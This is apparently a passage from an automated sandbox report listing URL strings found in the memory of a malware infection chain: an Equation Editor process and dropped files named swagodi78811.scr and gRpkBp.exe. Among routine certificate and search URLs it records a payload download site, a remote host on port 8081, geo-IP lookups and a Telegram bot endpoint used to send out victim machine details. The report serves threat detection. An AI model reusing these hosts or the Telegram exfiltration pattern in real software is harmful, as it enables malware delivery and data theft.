0000001D.00000002.663663825.000000000242C000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002449000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.00000000024A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.orgX
                Source: EQNEDT32.EXE, 00000009.00000002.392933618.00000000005EF000.00000004.00000020.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.665349754.0000000005A80000.00000004.00000020.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.665234805.0000000005C00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                Source: EQNEDT32.EXE, 00000009.00000002.393794677.00000000042B0000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000002.392933618.000000000054F000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000002.392933618.00000000005DF000.00000004.00000020.00020000.00000000.sdmp, swagodi78811.scr.9.dr, gRpkBp.exe.10.dr, swagodi[1].scr.9.drString found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
                Source: EQNEDT32.EXE, 00000009.00000002.393794677.00000000042B0000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000002.392933618.000000000054F000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000002.392933618.00000000005DF000.00000004.00000020.00020000.00000000.sdmp, swagodi78811.scr.9.dr, gRpkBp.exe.10.dr, swagodi[1].scr.9.drString found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
                Source: EQNEDT32.EXE, 00000009.00000002.392933618.00000000005EF000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000002.392933618.000000000054F000.00000004.00000020.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663426332.000000000079D000.00000004.00000020.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663315507.000000000077C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
                Source: EQNEDT32.EXE, 00000009.00000002.392933618.00000000005EF000.00000004.00000020.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663426332.000000000079D000.00000004.00000020.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663315507.000000000077C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
                Source: EQNEDT32.EXE, 00000009.00000002.392933618.00000000005EF000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000002.392933618.000000000054F000.00000004.00000020.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663426332.000000000079D000.00000004.00000020.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663315507.000000000077C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
                Source: EQNEDT32.EXE, 00000009.00000002.392933618.00000000005EF000.00000004.00000020.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663426332.00000000007E6000.00000004.00000020.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.665234805.0000000005C00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                Source: EQNEDT32.EXE, 00000009.00000002.392933618.00000000005EF000.00000004.00000020.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663426332.000000000079D000.00000004.00000020.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663315507.000000000077C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
                Source: EQNEDT32.EXE, 00000009.00000002.392933618.00000000005EF000.00000004.00000020.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663426332.000000000079D000.00000004.00000020.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663315507.000000000077C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
                Source: EQNEDT32.EXE, 00000009.00000002.393794677.00000000042B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.c
                Source: EQNEDT32.EXE, 00000009.00000002.393794677.00000000042B0000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000002.392933618.00000000005EF000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000002.392933618.000000000054F000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000002.392933618.00000000005DF000.00000004.00000020.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663426332.000000000079D000.00000004.00000020.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663315507.000000000077C000.00000004.00000020.00020000.00000000.sdmp, swagodi78811.scr.9.dr, gRpkBp.exe.10.dr, swagodi[1].scr.9.drString found in binary or memory: http://ocsp.comodoca.com0
                Source: EQNEDT32.EXE, 00000009.00000002.392933618.000000000054F000.00000004.00000020.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663426332.000000000079D000.00000004.00000020.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663315507.000000000077C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
                Source: EQNEDT32.EXE, 00000009.00000002.392933618.00000000005EF000.00000004.00000020.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663426332.000000000079D000.00000004.00000020.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663315507.000000000077C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
                Source: EQNEDT32.EXE, 00000009.00000002.392933618.00000000005EF000.00000004.00000020.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663426332.000000000079D000.00000004.00000020.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663315507.000000000077C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
                Source: EQNEDT32.EXE, 00000009.00000002.392933618.000000000054F000.00000004.00000020.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663426332.000000000079D000.00000004.00000020.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663315507.000000000077C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
                Source: EQNEDT32.EXE, 00000009.00000002.392933618.00000000005EF000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000002.392933618.000000000054F000.00000004.00000020.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663426332.000000000079D000.00000004.00000020.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663315507.000000000077C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
                Source: EQNEDT32.EXE, 00000009.00000002.392933618.00000000005EF000.00000004.00000020.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663426332.000000000079D000.00000004.00000020.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663315507.000000000077C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
                Source: swagodi78811.scr, 00000014.00000002.663684485.0000000002540000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.00000000024B4000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.0000000002595000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.0000000002586000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.000000000255E000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.000000000254E000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.000000000252B000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002493000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002482000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.00000000023B1000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.000000000243E000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002457000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.000000000242C000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002449000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.00000000024A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.org
                Source: swagodi78811.scr, 00000014.00000002.663684485.0000000002540000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.00000000024B4000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.0000000002595000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.0000000002586000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.000000000255E000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.000000000254E000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.000000000252B000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002493000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002482000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.00000000023B1000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.000000000243E000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002457000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.000000000242C000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002449000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.00000000024A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.orgX
                Source: taskeng.exe, 00000015.00000002.662983168.000000000033E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.microsoftXT7/windows/2004/02/mit/tas
                Source: swagodi78811.scr, 0000000A.00000002.410819357.0000000002101000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.00000000023F1000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 00000016.00000002.427914204.00000000021C1000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.00000000022F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: swagodi78811.scr, 0000000A.00000002.412121084.0000000003129000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663140063.000000000042B000.00000040.00000400.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.00000000023F1000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.00000000022F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
                Source: EQNEDT32.EXE, 00000009.00000002.392933618.00000000005EF000.00000004.00000020.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663426332.000000000079D000.00000004.00000020.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663315507.000000000077C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
                Source: EQNEDT32.EXE, 00000009.00000002.392933618.00000000005EF000.00000004.00000020.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663426332.000000000079D000.00000004.00000020.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663315507.000000000077C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
                Source: swagodi78811.scr, 00000014.00000002.663684485.0000000002683000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.0000000002670000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.00000000026C4000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.00000000026B1000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.00000000025D2000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.664487526.000000000336B000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.664487526.00000000033B7000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002591000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.000000000257E000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.00000000025BF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: swagodi78811.scr, 00000014.00000002.663684485.00000000025A4000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.00000000024B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                Source: swagodi78811.scr, 0000000A.00000002.412121084.0000000003129000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.00000000025A4000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663140063.000000000042B000.00000040.00000400.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.00000000024B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                Source: swagodi78811.scr, 00000014.00000002.663684485.00000000025A4000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.00000000024B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
                Source: swagodi78811.scr, 00000014.00000002.663684485.00000000025A4000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.00000000024B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:528110%0D%0ADate%20a
                Source: swagodi78811.scr, 00000014.00000002.663684485.0000000002683000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.0000000002670000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.00000000026C4000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.00000000026B1000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.00000000025D2000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.664487526.000000000336B000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.664487526.00000000033B7000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002591000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.000000000257E000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.00000000025BF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: swagodi78811.scr, 00000014.00000002.664602794.000000000352D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://download.visualstud
                Source: swagodi78811.scr, 00000014.00000002.663684485.0000000002683000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.0000000002670000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.00000000026C4000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.00000000026B1000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.00000000025D2000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.664487526.000000000336B000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.664487526.00000000033B7000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002591000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.000000000257E000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.00000000025BF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: swagodi78811.scr, 00000014.00000002.663684485.0000000002683000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.0000000002670000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.00000000026C4000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.00000000026B1000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.00000000025D2000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.664487526.000000000336B000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.664487526.00000000033B7000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002591000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.000000000257E000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.00000000025BF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: swagodi78811.scr, 00000014.00000002.663684485.0000000002683000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.0000000002670000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.00000000026C4000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.00000000026B1000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.00000000025D2000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.664487526.000000000336B000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.664487526.00000000033B7000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002591000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.000000000257E000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.00000000025BF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: EQNEDT32.EXE, EQNEDT32.EXE, 00000009.00000002.392933618.000000000054F000.00000004.00000020.00020000.00000000.sdmp, meridianresourcellc.top.url.0.drString found in binary or memory: https://meridianresourcellc.top/
                Source: swagodi.doc.url.0.drString found in binary or memory: https://meridianresourcellc.top/swagodi.doc
                Source: EQNEDT32.EXE, EQNEDT32.EXE, 00000009.00000002.392933618.000000000054F000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000002.393794677.00000000042A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://meridianresourcellc.top/swagodi.scr
                Source: EQNEDT32.EXE, 00000009.00000002.392933618.000000000054F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://meridianresourcellc.top/swagodi.scrj
                Source: EQNEDT32.EXE, 00000009.00000002.392933618.000000000054F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://meridianresourcellc.top/swagodi.scrllC:
                Source: EQNEDT32.EXE, 00000009.00000002.393794677.00000000042A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://meridianresourcellc.top/swagodi.scrsoC:
                Source: swagodi78811.scr, 00000014.00000002.663684485.0000000002540000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.0000000002595000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.0000000002586000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.00000000024DB000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.000000000255E000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.000000000254E000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.0000000002498000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.000000000252B000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002398000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002493000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002482000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.000000000243E000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002457000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.000000000242C000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002449000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.00000000024A1000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.00000000023DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                Source: swagodi78811.scr, 0000000A.00000002.412121084.0000000003129000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663140063.000000000042B000.00000040.00000400.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.0000000002498000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002398000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                Source: gRpkBp.exe, 0000001D.00000002.663663825.00000000023DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33
                Source: gRpkBp.exe, 0000001D.00000002.663663825.0000000002449000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.330Kp
                Source: swagodi78811.scr, 00000014.00000002.663684485.0000000002540000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.0000000002595000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.0000000002586000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.00000000024DB000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.000000000255E000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.000000000254E000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.000000000252B000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002493000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002482000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.000000000243E000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002457000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.000000000242C000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002449000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.00000000024A1000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.00000000023DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.334
                Source: swagodi78811.scr, 00000014.00000002.663684485.0000000002683000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.0000000002670000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.00000000026C4000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.00000000026B1000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.00000000025D2000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.664487526.000000000336B000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.664487526.00000000033B7000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002591000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.000000000257E000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.00000000025BF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
                Source: swagodi78811.scr, 00000014.00000002.663684485.0000000002683000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.0000000002670000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.00000000026C4000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.00000000026B1000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.00000000025D2000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.664487526.000000000336B000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.664487526.00000000033B7000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002591000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.000000000257E000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.00000000025BF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: EQNEDT32.EXE, 00000009.00000002.392933618.00000000005EF000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000002.392933618.000000000054F000.00000004.00000020.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663426332.000000000079D000.00000004.00000020.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663315507.000000000077C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
                Source: EQNEDT32.EXE, 00000009.00000002.393794677.00000000042B0000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000002.392933618.000000000054F000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000002.392933618.00000000005DF000.00000004.00000020.00020000.00000000.sdmp, swagodi78811.scr.9.dr, gRpkBp.exe.10.dr, swagodi[1].scr.9.drString found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0
                Source: gRpkBp.exe, 0000001D.00000002.663663825.00000000025BF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/favicon.ico
                Source: gRpkBp.exe, 0000001D.00000002.664487526.0000000003453000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.664487526.00000000034F6000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.664487526.00000000034CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search?q=net
                Source: gRpkBp.exe, 0000001D.00000002.664487526.00000000034CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search?q=test&oq=test&aqs=chrome..69i57j46j0l3j46j0.427j0j7&sourceid=chrome&i
                Source: gRpkBp.exe, 0000001D.00000002.664487526.0000000003468000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search?q=wmf
                Source: gRpkBp.exe, 0000001D.00000002.663663825.00000000025D2000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.664487526.00000000034C2000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.664487526.0000000003468000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/sorry/index
